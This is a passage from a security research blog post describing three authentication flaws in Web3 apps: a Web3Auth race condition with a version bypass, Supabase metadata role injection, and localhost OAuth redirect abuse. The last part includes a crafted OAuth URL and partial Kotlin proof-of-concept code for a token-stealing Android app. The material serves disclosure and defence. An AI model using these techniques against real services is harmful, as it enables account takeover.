experience.",{"type":26,"tag":35,"props":72098,"children":72099},{},[72100],{"type":32,"value":72101},"In our research, we focused on Web3 applications that rely on Web2-based authentication methods. Specifically, we analyzed the authentication flows of these applications and identified a lesser-known class of vulnerabilities.",{"type":26,"tag":35,"props":72103,"children":72104},{},[72105],{"type":32,"value":72106},"In this article, we will discuss three cases we discovered:",{"type":26,"tag":4820,"props":72108,"children":72109},{},[72110,72115,72128],{"type":26,"tag":3430,"props":72111,"children":72112},{},[72113],{"type":32,"value":72114},"OAuth Logic Vulnerability on an Authentication Provider",{"type":26,"tag":3430,"props":72116,"children":72117},{},[72118,72120,72126],{"type":32,"value":72119},"Supabase ",{"type":26,"tag":130,"props":72121,"children":72123},{"className":72122},[],[72124],{"type":32,"value":72125},"user_metadata",{"type":32,"value":72127}," misconfiguration",{"type":26,"tag":3430,"props":72129,"children":72130},{},[72131],{"type":32,"value":72132},"OAuth abuse in localhost development environment",{"type":26,"tag":92,"props":72134,"children":72136},{"id":72135},"abusing-oauth-authentication-logic",[72137],{"type":32,"value":72138},"Abusing OAuth Authentication Logic",{"type":26,"tag":35,"props":72140,"children":72141},{},[72142],{"type":32,"value":72143},"During our research, we initially identified some bugs in applications. However, these were mostly simple and well-known issues, so we decided to focus on vulnerabilities within authentication providers themselves.",{"type":26,"tag":118,"props":72145,"children":72147},{"id":72146},"web3auth-introduction",[72148],{"type":32,"value":72149},"Web3Auth Introduction",{"type":26,"tag":35,"props":72151,"children":72152},{},[72153,72160,72162,72169],{"type":26,"tag":41,"props":72154,"children":72157},{"href":72155,"rel":72156},"https://web3auth.io/",[45],[72158],{"type":32,"value":72159},"Web3Auth",{"type":32,"value":72161}," is a tool designed to simplify the login process for Web3 applications, eliminating the need for users to manage complex wallet setups or memorize lengthy passwords. One of its products, Web3Auth PnP (Plug and Play), supports ",{"type":26,"tag":41,"props":72163,"children":72166},{"href":72164,"rel":72165},"https://oauth.net/2/",[45],[72167],{"type":32,"value":72168},"OAuth2",{"type":32,"value":72170}," authentication using Google. The product employs a sophisticated authentication flow and infrastructure to maintain seamless integration with dApps.",{"type":26,"tag":118,"props":72172,"children":72174},{"id":72173},"web3auth-authentication-flow",[72175],{"type":32,"value":72176},"Web3Auth Authentication flow",{"type":26,"tag":35,"props":72178,"children":72179},{},[72180],{"type":32,"value":72181},"The Web3Auth PnP authentication flow involves a web session server that stores authentication parameters and configurations. Below is a diagram illustrating how the authentication process works:",{"type":26,"tag":35,"props":72183,"children":72184},{},[72185],{"type":26,"tag":2210,"props":72186,"children":72188},{"alt":53181,"src":72187},"/posts/web2-in-web3/auth-flow.png",[],{"type":26,"tag":35,"props":72190,"children":72191},{},[72192,72194,72200],{"type":32,"value":72193},"After the final redirect back to the dApp,  the application can use the secret token to authenticate with the service identified by the ",{"type":26,"tag":130,"props":72195,"children":72197},{"className":72196},[],[72198],{"type":32,"value":72199},"client_id",{"type":32,"value":72201},". This design ensures that you cannot use the token to authenticate against any unauthorized application.",{"type":26,"tag":35,"props":72203,"children":72204},{},[72205,72207,72213,72215,72221,72223,72230],{"type":32,"value":72206},"Additionally, it is important to note that each dApp has a whitelist of redirect URLs. The ",{"type":26,"tag":130,"props":72208,"children":72210},{"className":72209},[],[72211],{"type":32,"value":72212},"/start",{"type":32,"value":72214}," validates the ",{"type":26,"tag":130,"props":72216,"children":72218},{"className":72217},[],[72219],{"type":32,"value":72220},"redirect_url",{"type":32,"value":72222}," against the configured ",{"type":26,"tag":41,"props":72224,"children":72227},{"href":72225,"rel":72226},"https://web3auth.io/docs/dashboard-setup/whitelisting",[45],[72228],{"type":32,"value":72229},"whitelist",{"type":32,"value":72231}," to ensure it matches one of the allowed URLs.",{"type":26,"tag":118,"props":72233,"children":72235},{"id":72234},"in-transit-cryptography",[72236],{"type":32,"value":72237},"In-transit Cryptography",{"type":26,"tag":35,"props":72239,"children":72240},{},[72241,72243,72250,72252,72258,72260,72266,72268,72273,72275,72280],{"type":32,"value":72242},"The session server employs cryptography to securely send and receive authentication parameters. The ",{"type":26,"tag":41,"props":72244,"children":72247},{"href":72245,"rel":72246},"https://en.wikipedia.org/wiki/Key_(cryptography)",[45],[72248],{"type":32,"value":72249},"cryptographic key",{"type":32,"value":72251}," is derived from the ",{"type":26,"tag":130,"props":72253,"children":72255},{"className":72254},[],[72256],{"type":32,"value":72257},"sessionId",{"type":32,"value":72259},"  sent in the ",{"type":26,"tag":130,"props":72261,"children":72263},{"className":72262},[],[72264],{"type":32,"value":72265},"GET",{"type":32,"value":72267}," parameter to the ",{"type":26,"tag":130,"props":72269,"children":72271},{"className":72270},[],[72272],{"type":32,"value":72212},{"type":32,"value":72274},". Since the ",{"type":26,"tag":130,"props":72276,"children":72278},{"className":72277},[],[72279],{"type":32,"value":72257},{"type":32,"value":72281}," can be controlled, it allows us to send and receive data from the session server.",{"type":26,"tag":35,"props":72283,"children":72284},{},[72285],{"type":26,"tag":2210,"props":72286,"children":72288},{"alt":53181,"src":72287},"/posts/web2-in-web3/image-2.png",[],{"type":26,"tag":118,"props":72290,"children":72292},{"id":72291},"race-condition",[72293],{"type":32,"value":72294},"Race Condition",{"type":26,"tag":35,"props":72296,"children":72297},{},[72298,72300,72305,72307,72313,72315,72320,72322,72327],{"type":32,"value":72299},"As shown in the diagram, the configuration data from the session server is validated only during the ",{"type":26,"tag":130,"props":72301,"children":72303},{"className":72302},[],[72304],{"type":32,"value":72212},{"type":32,"value":72306}," and later used in the ",{"type":26,"tag":130,"props":72308,"children":72310},{"className":72309},[],[72311],{"type":32,"value":72312},"/end",{"type":32,"value":72314}," enpoint. This introduces a potential race condition that can be exploited if an attacker manages to modify the parameters after  validation (",{"type":26,"tag":130,"props":72316,"children":72318},{"className":72317},[],[72319],{"type":32,"value":72212},{"type":32,"value":72321},") but before  use (",{"type":26,"tag":130,"props":72323,"children":72325},{"className":72324},[],[72326],{"type":32,"value":72312},{"type":32,"value":4437},{"type":26,"tag":35,"props":72329,"children":72330},{},[72331,72333,72340,72342,72347],{"type":32,"value":72332},"To exploit this ",{"type":26,"tag":41,"props":72334,"children":72337},{"href":72335,"rel":72336},"https://portswigger.net/web-security/race-conditions",[45],[72338],{"type":32,"value":72339},"race condition",{"type":32,"value":72341},",  an attacker-controlled website can initiate the authentication flow normally. Then, it can send another request to the session server with the same ",{"type":26,"tag":130,"props":72343,"children":72345},{"className":72344},[],[72346],{"type":32,"value":72257},{"type":32,"value":72348}," but with modified malicious parameters.",{"type":26,"tag":35,"props":72350,"children":72351},{},[72352],{"type":26,"tag":84,"props":72353,"children":72354},{},[72355],{"type":32,"value":72356},"What can be modified to achieve something impactful?",{"type":26,"tag":35,"props":72358,"children":72359},{},[72360,72362,72368,72370,72375],{"type":32,"value":72361},"The answer is quite simple if you understand how OAuth works. The attacker can simply change the ",{"type":26,"tag":130,"props":72363,"children":72365},{"className":72364},[],[72366],{"type":32,"value":72367},"redirect_uri",{"type":32,"value":72369}," parameter to point to their own website and leak the secret token from the query string. With the secret token, they can authenticate against the application defined by ",{"type":26,"tag":130,"props":72371,"children":72373},{"className":72372},[],[72374],{"type":32,"value":72199},{"type":32,"value":470},{"type":26,"tag":35,"props":72377,"children":72378},{},[72379],{"type":26,"tag":2210,"props":72380,"children":72382},{"alt":53181,"src":72381},"/posts/web2-in-web3/image-3.png",[],{"type":26,"tag":35,"props":72384,"children":72385},{},[72386],{"type":32,"value":72387},"Using this exploit, we were able to create a website capable of taking over the accounts of victims who followed the standard OAuth flow.",{"type":26,"tag":118,"props":72389,"children":72391},{"id":72390},"patch-bypass",[72392],{"type":32,"value":72393},"Patch & Bypass",{"type":26,"tag":35,"props":72395,"children":72396},{},[72397],{"type":32,"value":72398},"The vulnerability was reported and remediated on the same day (super quickly!). However, we found that the fix was not backported to older versions.",{"type":26,"tag":35,"props":72400,"children":72401},{},[72402],{"type":32,"value":72403},"To bypass the fix we were able to change the version in the URL:",{"type":26,"tag":3426,"props":72405,"children":72406},{},[72407,72418],{"type":26,"tag":3430,"props":72408,"children":72409},{},[72410,72416],{"type":26,"tag":130,"props":72411,"children":72413},{"className":72412},[],[72414],{"type":32,"value":72415},"https://auth.web3auth.io/v8/start",{"type":32,"value":72417}," (latest version)",{"type":26,"tag":3430,"props":72419,"children":72420},{},[72421,72427],{"type":26,"tag":130,"props":72422,"children":72424},{"className":72423},[],[72425],{"type":32,"value":72426},"https://auth.web3auth.io/v6/start",{"type":32,"value":72428}," (bypass)",{"type":26,"tag":35,"props":72430,"children":72431},{},[72432],{"type":32,"value":72433},"We reported this issue, and it was addressed just as quickly!",{"type":26,"tag":92,"props":72435,"children":72437},{"id":72436},"supabase-metadata-manipulation",[72438],{"type":32,"value":72439},"Supabase metadata manipulation",{"type":26,"tag":118,"props":72441,"children":72443},{"id":72442},"supabase-authentication-flow",[72444],{"type":32,"value":72445},"Supabase Authentication flow",{"type":26,"tag":35,"props":72447,"children":72448},{},[72449,72456,72458,72465],{"type":26,"tag":41,"props":72450,"children":72453},{"href":72451,"rel":72452},"https://supabase.com/docs/guides/auth",[45],[72454],{"type":32,"value":72455},"Supabase",{"type":32,"value":72457}," is a Backend-as-a-Service (BaaS) platform that provides authentication, database, and real-time APIs. The authentication process begins when a user registers or logs in. Supabase generates a ",{"type":26,"tag":41,"props":72459,"children":72462},{"href":72460,"rel":72461},"https://jwt.io/",[45],[72463],{"type":32,"value":72464},"JWT",{"type":32,"value":72466}," for the authenticated user, embedding claims such as the user ID, roles, and additional metadata (either user-provided or system-generated). This token is then returned to the client and used for subsequent API requests, during which the server validates the JWT to confirm the user’s identity and permissions.",{"type":26,"tag":118,"props":72468,"children":72470},{"id":72469},"jwt-verification",[72471],{"type":32,"value":72472},"JWT verification",{"type":26,"tag":35,"props":72474,"children":72475},{},[72476,72478,72483,72484,72490,72492,72498],{"type":32,"value":72477},"In one of our clients' systems, we discovered a vulnerability that allowed the inclusion of custom fields, such as ",{"type":26,"tag":130,"props":72479,"children":72481},{"className":72480},[],[72482],{"type":32,"value":72125},{"type":32,"value":3339},{"type":26,"tag":130,"props":72485,"children":72487},{"className":72486},[],[72488],{"type":32,"value":72489},"identity_data",{"type":32,"value":72491},", in a signup request by manipulating the input inside the ",{"type":26,"tag":130,"props":72493,"children":72495},{"className":72494},[],[72496],{"type":32,"value":72497},"\"data\": {}",{"type":32,"value":72499}," structure. These fields were then directly reflected in the issued JWT without validation.",{"type":26,"tag":35,"props":72501,"children":72502},{},[72503,72505,72511,72512,72518,72520,72526],{"type":32,"value":72504},"For example, an attacker could send a signup request with arbitrary data, such as ",{"type":26,"tag":130,"props":72506,"children":72508},{"className":72507},[],[72509],{"type":32,"value":72510},"\"role\": \"admin\"",{"type":32,"value":15725},{"type":26,"tag":130,"props":72513,"children":72515},{"className":72514},[],[72516],{"type":32,"value":72517},"\"email_verified\": true",{"type":32,"value":72519},", which would subsequently be included in the JWT claims. Additionally, it was possible to insert arbitrary fields beyond typical inputs, such as ",{"type":26,"tag":130,"props":72521,"children":72523},{"className":72522},[],[72524],{"type":32,"value":72525},"\"test\": \"test\"",{"type":32,"value":72527},", enabling us to inject arbitrary data into the final JWT token.",{"type":26,"tag":35,"props":72529,"children":72530},{},[72531],{"type":26,"tag":2210,"props":72532,"children":72534},{"alt":53181,"src":72533},"/posts/web2-in-web3/image-4.png",[],{"type":26,"tag":35,"props":72536,"children":72537},{},[72538],{"type":32,"value":72539},"In this example we are controlling the \"role\" field within the user metadata. If the application manage roles using the metadata, it would be vulnerable to a privilege escalation since anyone could inject any role there.",{"type":26,"tag":35,"props":72541,"children":72542},{},[72543],{"type":32,"value":72544},"The attacker could subsequently log in on the main platform, retrieve the token, and verify that their injected parameters persist in the JWT by submitting it to a verification endpoint. This happens because a function parseSupaBase was parsing and verifying everything generated by the JWT supabase token.",{"type":26,"tag":5512,"props":72546,"children":72548},{"className":33958,"code":72547,"language":33960,"meta":7,"style":7},"function parseSupaBase(token) {\n    try {\n        const [header, payload, signature] = token.split('.');\n        const decodedHeader = JSON.parse(atob(header));\n        const decodedPayload = JSON.parse(atob(payload));\n        return { header: decodedHeader, payload: decodedPayload, signature };\n    } catch (error) {\n        console.error('Error parsing token:', error);\n        return null;\n    }\n}\n",[72549],{"type":26,"tag":130,"props":72550,"children":72551},{"__ignoreMap":7},[72552,72577,72589,72658,72707,72755,72800,72823,72860,72876,72883],{"type":26,"tag":137,"props":72553,"children":72554},{"class":5559,"line":5560},[72555,72559,72564,72568,72573],{"type":26,"tag":137,"props":72556,"children":72557},{"style":5573},[72558],{"type":32,"value":33972},{"type":26,"tag":137,"props":72560,"children":72561},{"style":5682},[72562],{"type":32,"value":72563}," parseSupaBase",{"type":26,"tag":137,"props":72565,"children":72566},{"style":5601},[72567],{"type":32,"value":165},{"type":26,"tag":137,"props":72569,"children":72570},{"style":5584},[72571],{"type":32,"value":72572},"token",{"type":26,"tag":137,"props":72574,"children":72575},{"style":5601},[72576],{"type":32,"value":17395},{"type":26,"tag":137,"props":72578,"children":72579},{"class":5559,"line":5412},[72580,72585],{"type":26,"tag":137,"props":72581,"children":72582},{"style":5610},[72583],{"type":32,"value":72584},"    try",{"type":26,"tag":137,"props":72586,"children":72587},{"style":5601},[72588],{"type":32,"value":5875},{"type":26,"tag":137,"props":72590,"children":72591},{"class":5559,"line":5417},[72592,72596,72600,72605,72609,72614,72618,72623,72627,72631,72636,72640,72645,72649,72654],{"type":26,"tag":137,"props":72593,"children":72594},{"style":5573},[72595],{"type":32,"value":35497},{"type":26,"tag":137,"props":72597,"children":72598},{"style":5601},[72599],{"type":32,"value":25612},{"type":26,"tag":137,"props":72601,"children":72602},{"style":5584},[72603],{"type":32,"value":72604},"header",{"type":26,"tag":137,"props":72606,"children":72607},{"style":5601},[72608],{"type":32,"value":1108},{"type":26,"tag":137,"props":72610,"children":72611},{"style":5584},[72612],{"type":32,"value":72613},"payload",{"type":26,"tag":137,"props":72615,"children":72616},{"style":5601},[72617],{"type":32,"value":1108},{"type":26,"tag":137,"props":72619,"children":72620},{"style":5584},[72621],{"type":32,"value":72622},"signature",{"type":26,"tag":137,"props":72624,"children":72625},{"style":5601},[72626],{"type":32,"value":11247},{"type":26,"tag":137,"props":72628,"children":72629},{"style":5590},[72630],{"type":32,"value":289},{"type":26,"tag":137,"props":72632,"children":72633},{"style":5584},[72634],{"type":32,"value":72635}," token",{"type":26,"tag":137,"props":72637,"children":72638},{"style":5601},[72639],{"type":32,"value":470},{"type":26,"tag":137,"props":72641,"children":72642},{"style":5682},[72643],{"type":32,"value":72644},"split",{"type":26,"tag":137,"props":72646,"children":72647},{"style":5601},[72648],{"type":32,"value":165},{"type":26,"tag":137,"props":72650,"children":72651},{"style":6837},[72652],{"type":32,"value":72653},"'.'",{"type":26,"tag":137,"props":72655,"children":72656},{"style":5601},[72657],{"type":32,"value":6430},{"type":26,"tag":137,"props":72659,"children":72660},{"class":5559,"line":5642},[72661,72665,72670,72674,72678,72682,72686,72690,72695,72699,72703],{"type":26,"tag":137,"props":72662,"children":72663},{"style":5573},[72664],{"type":32,"value":35497},{"type":26,"tag":137,"props":72666,"children":72667},{"style":5584},[72668],{"type":32,"value":72669}," decodedHeader",{"type":26,"tag":137,"props":72671,"children":72672},{"style":5590},[72673],{"type":32,"value":5593},{"type":26,"tag":137,"props":72675,"children":72676},{"style":5584},[72677],{"type":32,"value":40124},{"type":26,"tag":137,"props":72679,"children":72680},{"style":5601},[72681],{"type":32,"value":470},{"type":26,"tag":137,"props":72683,"children":72684},{"style":5682},[72685],{"type":32,"value":41808},{"type":26,"tag":137,"props":72687,"children":72688},{"style":5601},[72689],{"type":32,"value":165},{"type":26,"tag":137,"props":72691,"children":72692},{"style":5682},[72693],{"type":32,"value":72694},"atob",{"type":26,"tag":137,"props":72696,"children":72697},{"style":5601},[72698],{"type":32,"value":165},{"type":26,"tag":137,"props":72700,"children":72701},{"style":5584},[72702],{"type":32,"value":72604},{"type":26,"tag":137,"props":72704,"children":72705},{"style":5601},[72706],{"type":32,"value":9807},{"type":26,"tag":137,"props":72708,"children":72709},{"class":5559,"line":5745},[72710,72714,72719,72723,72727,72731,72735,72739,72743,72747,72751],{"type":26,"tag":137,"props":72711,"children":72712},{"style":5573},[72713],{"type":32,"value":35497},{"type":26,"tag":137,"props":72715,"children":72716},{"style":5584},[72717],{"type":32,"value":72718}," decodedPayload",{"type":26,"tag":137,"props":72720,"children":72721},{"style":5590},[72722],{"type":32,"value":5593},{"type":26,"tag":137,"props":72724,"children":72725},{"style":5584},[72726],{"type":32,"value":40124},{"type":26,"tag":137,"props":72728,"children":72729},{"style":5601},[72730],{"type":32,"value":470},{"type":26,"tag":137,"props":72732,"children":72733},{"style":5682},[72734],{"type":32,"value":41808},{"type":26,"tag":137,"props":72736,"children":72737},{"style":5601},[72738],{"type":32,"value":165},{"type":26,"tag":137,"props":72740,"children":72741},{"style":5682},[72742],{"type":32,"value":72694},{"type":26,"tag":137,"props":72744,"children":72745},{"style":5601},[72746],{"type":32,"value":165},{"type":26,"tag":137,"props":72748,"children":72749},{"style":5584},[72750],{"type":32,"value":72613},{"type":26,"tag":137,"props":72752,"children":72753},{"style":5601},[72754],{"type":32,"value":9807},{"type":26,"tag":137,"props":72756,"children":72757},{"class":5559,"line":5850},[72758,72762,72766,72771,72775,72779,72784,72788,72792,72796],{"type":26,"tag":137,"props":72759,"children":72760},{"style":5610},[72761],{"type":32,"value":18336},{"type":26,"tag":137,"props":72763,"children":72764},{"style":5601},[72765],{"type":32,"value":12175},{"type":26,"tag":137,"props":72767,"children":72768},{"style":5584},[72769],{"type":32,"value":72770},"header:",{"type":26,"tag":137,"props":72772,"children":72773},{"style":5584},[72774],{"type":32,"value":72669},{"type":26,"tag":137,"props":72776,"children":72777},{"style":5601},[72778],{"type":32,"value":1108},{"type":26,"tag":137,"props":72780,"children":72781},{"style":5584},[72782],{"type":32,"value":72783},"payload:",{"type":26,"tag":137,"props":72785,"children":72786},{"style":5584},[72787],{"type":32,"value":72718},{"type":26,"tag":137,"props":72789,"children":72790},{"style":5601},[72791],{"type":32,"value":1108},{"type":26,"tag":137,"props":72793,"children":72794},{"style":5584},[72795],{"type":32,"value":72622},{"type":26,"tag":137,"props":72797,"children":72798},{"style":5601},[72799],{"type":32,"value":20892},{"type":26,"tag":137,"props":72801,"children":72802},{"class":5559,"line":5878},[72803,72807,72811,72815,72819],{"type":26,"tag":137,"props":72804,"children":72805},{"style":5601},[72806],{"type":32,"value":18371},{"type":26,"tag":137,"props":72808,"children":72809},{"style":5610},[72810],{"type":32,"value":51013},{"type":26,"tag":137,"props":72812,"children":72813},{"style":5601},[72814],{"type":32,"value":4625},{"type":26,"tag":137,"props":72816,"children":72817},{"style":5584},[72818],{"type":32,"value":17455},{"type":26,"tag":137,"props":72820,"children":72821},{"style":5601},[72822],{"type":32,"value":17395},{"type":26,"tag":137,"props":72824,"children":72825},{"class":5559,"line":5891},[72826,72831,72835,72839,72843,72848,72852,72856],{"type":26,"tag":137,"props":72827,"children":72828},{"style":5584},[72829],{"type":32,"value":72830},"        console",{"type":26,"tag":137,"props":72832,"children":72833},{"style":5601},[72834],{"type":32,"value":470},{"type":26,"tag":137,"props":72836,"children":72837},{"style":5682},[72838],{"type":32,"value":17455},{"type":26,"tag":137,"props":72840,"children":72841},{"style":5601},[72842],{"type":32,"value":165},{"type":26,"tag":137,"props":72844,"children":72845},{"style":6837},[72846],{"type":32,"value":72847},"'Error parsing token:'",{"type":26,"tag":137,"props":72849,"children":72850},{"style":5601},[72851],{"type":32,"value":1108},{"type":26,"tag":137,"props":72853,"children":72854},{"style":5584},[72855],{"type":32,"value":17455},{"type":26,"tag":137,"props":72857,"children":72858},{"style":5601},[72859],{"type":32,"value":6430},{"type":26,"tag":137,"props":72861,"children":72862},{"class":5559,"line":5909},[72863,72867,72872],{"type":26,"tag":137,"props":72864,"children":72865},{"style":5610},[72866],{"type":32,"value":18336},{"type":26,"tag":137,"props":72868,"children":72869},{"style":5573},[72870],{"type":32,"value":72871}," null",{"type":26,"tag":137,"props":72873,"children":72874},{"style":5601},[72875],{"type":32,"value":5604},{"type":26,"tag":137,"props":72877,"children":72878},{"class":5559,"line":5930},[72879],{"type":26,"tag":137,"props":72880,"children":72881},{"style":5601},[72882],{"type":32,"value":5945},{"type":26,"tag":137,"props":72884,"children":72885},{"class":5559,"line":5939},[72886],{"type":26,"tag":137,"props":72887,"children":72888},{"style":5601},[72889],{"type":32,"value":6507},{"type":26,"tag":118,"props":72891,"children":72892},{"id":42930},[72893],{"type":32,"value":42933},{"type":26,"tag":35,"props":72895,"children":72896},{},[72897,72899,72906,72908,72914],{"type":32,"value":72898},"Developers should avoid trusting input from their Supabase custom domain. ",{"type":26,"tag":41,"props":72900,"children":72903},{"href":72901,"rel":72902},"https://supabase.com/docs/guides/database/postgres/row-level-security",[45],[72904],{"type":32,"value":72905},"Row-Level Security",{"type":32,"value":72907}," (RLS) on Supabase should be enforced, plus important and private fields should be defined in ",{"type":26,"tag":130,"props":72909,"children":72911},{"className":72910},[],[72912],{"type":32,"value":72913},"app_metadata",{"type":32,"value":72915},". These fields must be strictly validated at every step of their creation and update processes.",{"type":26,"tag":92,"props":72917,"children":72919},{"id":72918},"oauth-in-development-environments",[72920],{"type":32,"value":72921},"OAuth in development environments",{"type":26,"tag":35,"props":72923,"children":72924},{},[72925,72927,72934,72936,72941],{"type":32,"value":72926},"After watching a ",{"type":26,"tag":41,"props":72928,"children":72931},{"href":72929,"rel":72930},"https://docs.google.com/presentation/d/1571_ZSOtfVat9u63zfn1ugTPZRN7pQsFIblcxci3czM/edit",[45],[72932],{"type":32,"value":72933},"talk",{"type":32,"value":72935}," by Luan Herrera on exploiting the logic of desktop apps that use OAuth for authentication (specifically using a localhost server), we noticed that many of our customers also permitted localhost within the ",{"type":26,"tag":130,"props":72937,"children":72939},{"className":72938},[],[72940],{"type":32,"value":72367},{"type":32,"value":72942}," parameter during the OAuth flow.",{"type":26,"tag":35,"props":72944,"children":72945},{},[72946,72948,72955],{"type":32,"value":72947},"Herrera's research highlights that if localhost is allowed as a redirect URI, it is generally not exploitable in a desktop environment because impersonating localhost without ",{"type":26,"tag":41,"props":72949,"children":72952},{"href":72950,"rel":72951},"https://www.cloudflare.com/learning/security/what-is-remote-code-execution/",[45],[72953],{"type":32,"value":72954},"Remote Code Execution",{"type":32,"value":72956}," (RCE) is impossible. However, the scenario changes in a mobile environment, where it is feasible to open a localhost web server using a malicious app, making exploitation possible.",{"type":26,"tag":35,"props":72958,"children":72959},{},[72960,72962,72968],{"type":32,"value":72961},"In one of our client's implementations, we identified that ",{"type":26,"tag":130,"props":72963,"children":72965},{"className":72964},[],[72966],{"type":32,"value":72967},"localhost:3000",{"type":32,"value":72969}," was permitted. The exploitation method is the same as demonstrated in Herrera's talk. However, we observed that localhost servers are frequently used and whitelisted by developers, not only for desktop applications but also for testing and development environments.",{"type":26,"tag":35,"props":72971,"children":72972},{},[72973],{"type":32,"value":72974},"For the exploitation, the final Google OAuth URL was constructed as follows:",{"type":26,"tag":5512,"props":72976,"children":72980},{"className":72977,"code":72978,"language":72979,"meta":7,"style":7},"language-url shiki shiki-themes slack-dark","https://accounts.google.com/o/oauth2/v2/auth?client_id=redacted&scope=openid%20email%20profile&response_type=code&redirect_uri=http%3A%2F%2Flocalhost%3A3000%2Fapi%2Fauth%2Fcallback%2Fgoogle&prompt=none&access_type=offline&state=2UTJ8naHVglSQQupa1jw1lugsaZr8f5M9hxZp7bxISM&code_challenge=e6_Onj804xizwJzVT5Pf8luKPbtLV-EJssR7I58UQp8&code_challenge_method=S256&service=lso&o2v=2&ddm=1&flowName=GeneralOAuthFlow\n","url",[72981],{"type":26,"tag":130,"props":72982,"children":72983},{"__ignoreMap":7},[72984],{"type":26,"tag":137,"props":72985,"children":72986},{"class":5559,"line":5560},[72987],{"type":26,"tag":137,"props":72988,"children":72989},{},[72990],{"type":32,"value":72978},{"type":26,"tag":35,"props":72992,"children":72993},{},[72994],{"type":32,"value":72995},"Since there was no public exploit, we also created a proof of concept demonstrating how a malicious APK can be created to steal the OAuth token simply by opening the malicious app. This occurs without any user interaction and results in account takeover.",{"type":26,"tag":5512,"props":72997,"children":73001},{"className":72998,"code":72999,"language":73000,"meta":7,"style":7},"language-kotlin shiki shiki-themes slack-dark","class MainActivity : AppCompatActivity() {\n\n    override fun onCreate(savedInstanceState: Bundle?) {\n        super.onCreate(savedInstanceState)\n\n        // Start the Ktor web server\n        CoroutineScope(Dispatchers.IO).launch {\n            try {\n                startWebServer()\n                Log.d(\"WebServer\", \"Server started on http://localhost:3000\")\n            } catch (e: Exception) {\n                Log.e(\"WebServer\", \"Error starting server: ${e.message}\", e)\n            }\n        }\n\n        // Open the Google OAuth page\n        val googleOAuthUrl = \"https://accounts.google.com/o/oauth2/v2/auth?client_id=redacted&scope=openid%20email%20profile&response_type=code&redirect_uri=http%3A%2F%2Flocalhost%3A3000%2Fapi%2Fauth%2Fcallback%2Fgoogle&prompt=none&access_type=offline&state=2UTJ8naHVglSQQupa1jw1lugsaZr8f5M9hxZp7bxISM&code_challenge=e6_Onj804xizwJzVT5Pf8luKPbtLV-EJssR7I58UQp8&code_challenge_method=S256&service=lso&o2v=2&ddm=1&flowName=GeneralOAuthFlow\"\n        val browserIntent = Intent(Intent.ACTION_VIEW, Uri.parse(googleOAuthUrl))\n        startActivity(browserIntent)\n    }\n\n    private fun startWebServer() {\n        embeddedServer(CIO, port = 3000) {\n            routing {\n                get(\"{...}\") {\n                    call.respondHtml {\n                        head {\n                            meta(charset = \"UTF-8\")\n                            meta(name = \"viewport\", content = \"width=device-width, initial-scale=1.0\")\n                            title(\"OAuth Redirect\")\n                        }\n                        body {\n                            h1 { +\"Google OAuth Redirect\" }\n                            script {\n                                +\"document.body.innerText = location.search;\"\n                            }\n                        }\n                    }\n                }\n            }\n        }.start(wait = true)\n    }\n}\n","kotlin",[73002],{"type":26,"tag":130,"props":73003,"children":73004},{"__ignoreMap":7},[73005,73032,73039,73071,73093,73100,73108,73130,73142,73154,73188,73214,73264,73271,73278,73285,73293,73315,73350,73363,73370,73377,73398,73424,73436,73457,73474,73486,73512,73551,73572,73580,73592,73617,73629,73642,73650,73657,73665,73673,73680,73710,73717],{"type":26,"tag":137,"props":73006,"children":73007},{"class":5559,"line":5560},[73008,73013,73018,73023,73028],{"type":26,"tag":137,"props":73009,"children":73010},{"style":5573},[73011],{"type":32,"value":73012},"class",{"type":26,"tag":137,"props":73014,"children":73015},{"style":6009},[73016],{"type":32,"value":73017}," MainActivity",{"type":26,"tag":137,"props":73019,"children":73020},{"style":5601},[73021],{"type":32,"value":73022}," : ",{"type":26,"tag":137,"props":73024,"children":73025},{"style":6009},[73026],{"type":32,"value":73027},"AppCompatActivity",{"type":26,"tag":137,"props":73029,"children":73030},{"style":5601},[73031],{"type":32,"value":18328},{"type":26,"tag":137,"props":73033,"children":73034},{"class":5559,"line":5412},[73035],{"type":26,"tag":137,"props":73036,"children":73037},{"emptyLinePlaceholder":18},[73038],{"type":32,"value":6276},{"type":26,"tag":137,"props":73040,"children":73041},{"class":5559,"line":5417},[73042,73047,73051,73056,73061,73066],{"type":26,"tag":137,"props":73043,"children":73044},{"style":5573},[73045],{"type":32,"value":73046},"    override",{"type":26,"tag":137,"props":73048,"children":73049},{"style":5573},[73050],{"type":32,"value":8792},{"type":26,"tag":137,"props":73052,"children":73053},{"style":5682},[73054],{"type":32,"value":73055}," onCreate",{"type":26,"tag":137,"props":73057,"children":73058},{"style":5601},[73059],{"type":32,"value":73060},"(savedInstanceState: ",{"type":26,"tag":137,"props":73062,"children":73063},{"style":6009},[73064],{"type":32,"value":73065},"Bundle",{"type":26,"tag":137,"props":73067,"children":73068},{"style":5601},[73069],{"type":32,"value":73070},"?) {\n",{"type":26,"tag":137,"props":73072,"children":73073},{"class":5559,"line":5642},[73074,73079,73083,73088],{"type":26,"tag":137,"props":73075,"children":73076},{"style":5573},[73077],{"type":32,"value":73078},"        super",{"type":26,"tag":137,"props":73080,"children":73081},{"style":5601},[73082],{"type":32,"value":470},{"type":26,"tag":137,"props":73084,"children":73085},{"style":5682},[73086],{"type":32,"value":73087},"onCreate",{"type":26,"tag":137,"props":73089,"children":73090},{"style":5601},[73091],{"type":32,"value":73092},"(savedInstanceState)\n",{"type":26,"tag":137,"props":73094,"children":73095},{"class":5559,"line":5745},[73096],{"type":26,"tag":137,"props":73097,"children":73098},{"emptyLinePlaceholder":18},[73099],{"type":32,"value":6276},{"type":26,"tag":137,"props":73101,"children":73102},{"class":5559,"line":5850},[73103],{"type":26,"tag":137,"props":73104,"children":73105},{"style":5564},[73106],{"type":32,"value":73107},"        // Start the Ktor web server\n",{"type":26,"tag":137,"props":73109,"children":73110},{"class":5559,"line":5878},[73111,73116,73121,73126],{"type":26,"tag":137,"props":73112,"children":73113},{"style":5682},[73114],{"type":32,"value":73115},"        CoroutineScope",{"type":26,"tag":137,"props":73117,"children":73118},{"style":5601},[73119],{"type":32,"value":73120},"(Dispatchers.IO).",{"type":26,"tag":137,"props":73122,"children":73123},{"style":5682},[73124],{"type":32,"value":73125},"launch",{"type":26,"tag":137,"props":73127,"children":73128},{"style":5601},[73129],{"type":32,"value":5875},{"type":26,"tag":137,"props":73131,"children":73132},{"class":5559,"line":5891},[73133,73138],{"type":26,"tag":137,"props":73134,"children":73135},{"style":5610},[73136],{"type":32,"value":73137},"            try",{"type":26,"tag":137,"props":73139,"children":73140},{"style":5601},[73141],{"type":32,"value":5875},{"type":26,"tag":137,"props":73143,"children":73144},{"class":5559,"line":5909},[73145,73150],{"type":26,"tag":137,"props":73146,"children":73147},{"style":5682},[73148],{"type":32,"value":73149},"                